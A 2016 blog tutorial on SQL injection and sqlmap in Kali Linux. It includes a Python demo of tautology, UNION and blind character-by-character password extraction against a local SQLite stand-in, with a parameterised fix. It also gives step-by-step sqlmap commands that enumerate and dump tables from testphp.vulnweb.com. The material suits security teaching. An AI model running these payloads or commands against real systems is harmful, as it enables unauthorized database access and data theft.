Friday, November 4, 2016

sqlmap Tutorial Using Kali Linux


What is SQL Injection?

SQL injection is an attack technique that exploits a vulnerability in the database layer of an application. Attackers use it to obtain unauthorized access to the underlying data, the database structure and the DBMS itself. It is one of the most common web application vulnerabilities.

SQL injection happens when a developer takes user input, places it directly into the text of a SQL statement and does not validate it or escape the characters that have meaning to SQL. Because the input becomes part of the statement's grammar rather than a plain value, an attacker can alter the SQL that reaches the database and not only read data she should not see but also modify and delete it. The fix is to keep data out of the statement text: pass user input as a bound parameter (prepared statement) so the database never parses it as SQL.


What is SQLmap?

"It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers."

It comes with a powerful detection engine, many niche features for the penetration tester and a broad range of switches ranging from database fingerprinting, over fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features of sqlmap
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name. 
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where the relevant column names contain strings like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  • Support for database process user privilege escalation via Metasploit’s Meterpreter getsystem command.
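The "What is SQL Injection?" section above describes how spliced-in input rewrites a query, and the feature list names boolean-based blind injection as one of the techniques sqlmap automates. The script below is an added example written for this page (it is not code from the tutorial and not part of sqlmap) that puts both together against a local SQLite stand-in for listproducts.php?cat=1. The table and column names follow the tutorial's acuart database, but the rows, the users table contents, the function names and the 'admin' password are all constructed here:

```python
# Added example: not code from the original tutorial or from sqlmap itself.
# A local stand-in for the page the tutorial targets (listproducts.php?cat=1):
# an in-memory SQLite database with a constructed 'categ' and 'users' table
# (names follow the tutorial, the rows are made up), a query function that
# splices the 'cat' parameter into SQL text the way a vulnerable PHP script
# does, and the parameterised version that is not injectable.
import sqlite3


def build_db() -> sqlite3.Connection:
    """Create the constructed sample database (all rows are fictitious)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE categ (cat_id INTEGER, cdesc TEXT, cname TEXT);
        INSERT INTO categ VALUES (1, 'Wall art', 'Posters');
        INSERT INTO categ VALUES (2, 'Canvas',   'Paintings');
        INSERT INTO categ VALUES (3, 'Photos',   'Stock');
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
        """
    )
    return conn


def list_products_vulnerable(conn, cat: str):
    """Equivalent of  "... WHERE cat_id=" . $_GET['cat']  : the raw input
    becomes part of the SQL grammar, so the attacker can rewrite the query."""
    sql = "SELECT cat_id, cname FROM categ WHERE cat_id = " + cat
    return conn.execute(sql).fetchall()


def list_products_safe(conn, cat: str):
    """Parameterised form: the driver passes the value separately from the
    statement text, so whatever it contains is compared as data, never parsed
    as SQL."""
    sql = "SELECT cat_id, cname FROM categ WHERE cat_id = ?"
    return conn.execute(sql, (cat,)).fetchall()


def page_shows_products(conn, cat: str) -> bool:
    """The only signal a boolean-based blind attacker gets back: did the page
    render at least one product row for this value of 'cat'?"""
    return len(list_products_vulnerable(conn, cat)) > 0


def blind_extract(conn, subquery: str, max_len: int = 64):
    """Recover the string result of `subquery` through the yes/no oracle only,
    one character at a time, bisecting on the character code (7 requests per
    character instead of up to 127). This is the loop sqlmap runs for you when
    it reports a boolean-based blind injection. Returns (value, requests)."""
    value, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                      # ASCII code of the unknown char
        while lo < hi:
            mid = (lo + hi) // 2
            # A true condition keeps the original row (cat_id = 1); a false one
            # returns nothing. unicode('') is NULL in SQLite, so a position
            # past the end of the string always answers "false".
            payload = f"1 AND unicode(substr(({subquery}),{pos},1)) > {mid}"
            requests += 1
            if page_shows_products(conn, payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                          # no character here: end of string
            break
        value += chr(lo)
    return value, requests


if __name__ == "__main__":
    db = build_db()
    # 1. Tautology: every row comes back, the WHERE clause is neutralised.
    print(list_products_vulnerable(db, "1 OR 1=1"))
    # 2. UNION: rows from another table (users) ride along with the products.
    print(list_products_vulnerable(db, "1 UNION SELECT uname, pass FROM users"))
    # 3. The same input against the parameterised query matches nothing.
    print(list_products_safe(db, "1 OR 1=1"), list_products_safe(db, "1"))
    # 4. Boolean-based blind: pull the admin password with true/false answers.
    print(blind_extract(db, "SELECT pass FROM users WHERE uname = 'admin'"))
```

Run it with python3. The parameterised query is the developer-side fix; the blind_extract loop is why a --dump through a boolean-based blind injection takes many requests and some time: every recovered character costs seven round trips to the server, and sqlmap is doing exactly this bookkeeping for you.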



Hacking a web application using sqlmap


First of all you need Kali or BackTrack Linux running on your computer or laptop. Other Linux distributions work too, but you will have to install sqlmap separately, whereas Kali Linux ships it as a built-in package. If you do not have Kali Linux installed, you can boot it from a bootable USB stick or a Kali Linux live CD.

Boot your computer into Kali Linux, then find sqlmap in the application menu under

Applications → Database Assessment → sqlmap



Type the following command into the terminal (quote the URL so the shell does not treat the ? and & in the query string specially):

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1"



When you run this command sqlmap prints a series of messages: it processes the URL, sends a set of test payloads to the cat parameter and reports whether the URL is injectable or not. Sometimes sqlmap asks a yes/no question such as "it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]"; answer with "y" or "n". The capital letter is the default, which you can accept by pressing Enter. If you want sqlmap to accept every default without asking, add the --batch option.

(Note that sqlmap colours its messages: info messages are green, warnings yellow and error messages red.)

Now it is the turn of enumerating the website's databases.
Enter the following command to list the databases available on the website:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs


This command lists the databases reachable through the injection; for this website two databases are available. The --dbs option tells sqlmap to enumerate the DBMS databases.

Next we choose the acuart database and enumerate its tables, which shows how many tables the acuart database contains. Select the database with -D <database name> and replace --dbs with --tables:



sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables


The result of the above command looks like this:

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Now you have the list of tables in the acuart database; choose any one of the 8 tables. Here I pick the categ table and look at its columns, i.e. its structure. To enumerate the columns of the categ table, select the table with -T <table name> and use --columns (sqlmap options are case sensitive, so --Columns would be rejected):

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T categ --columns

The categ table has 3 columns; the output is shown in the screenshot above. You now know the target database, its tables and the table structure, so it is time to dump the data from a specific table.

We can fetch data from a single column or from several columns at once. Specify the database with -D, the table with -T and the columns with -C, separating multiple columns with commas; --dump retrieves all the data from the specified columns (leave out -C to dump the whole table). The final command looks like this:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T categ -C cat_id,cdesc,cname --dump

Here is the result of the above command.



The categ table holds 4 entries in total, and all of them are also written to a file named categ.csv. sqlmap keeps its dumps under the .sqlmap/output directory in your home directory (/root when you run as root on Kali), in a subdirectory per target host, database and table.

To use this file elsewhere, copy it to a location of your choice. First change into the dump directory with the following command:

cd ~/.sqlmap/output/testphp.vulnweb.com/dump/acuart

Once in the acuart directory, type ls to list the files it contains, then copy categ.csv into the root home directory so you can use it for further processing:

cp categ.csv /root

Both the cd and the cp command are shown in the screenshot below.


LEGAL DISCLAIMER

If you do not fully understand something in this material, do not use it. Refer to the laws of your province/country before accessing, using or otherwise utilizing this material.

This material is for educational and research purposes only. We are not responsible for any misuse of it.

